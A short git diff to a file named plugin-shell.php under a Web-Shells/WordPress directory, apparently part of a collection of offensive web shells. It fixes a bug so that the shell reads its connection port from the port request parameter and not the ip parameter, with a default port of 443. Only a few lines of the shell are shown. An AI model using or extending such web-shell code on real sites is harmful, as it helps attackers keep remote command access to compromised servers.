diff --git a/Web-Shells/WordPress/plugin-shell.php b/Web-Shells/WordPress/plugin-shell.php index bac69fc9..6df1ede3 100755 --- a/Web-Shells/WordPress/plugin-shell.php +++ b/Web-Shells/WordPress/plugin-shell.php @@ -30,7 +30,7 @@ if(isset($_REQUEST[$cmd])) { # default port 443 $port = '443'; - if(isset($_REQUEST[$ip])){ + if(isset($_REQUEST[$port])){ $port = $_REQUEST[$port]; }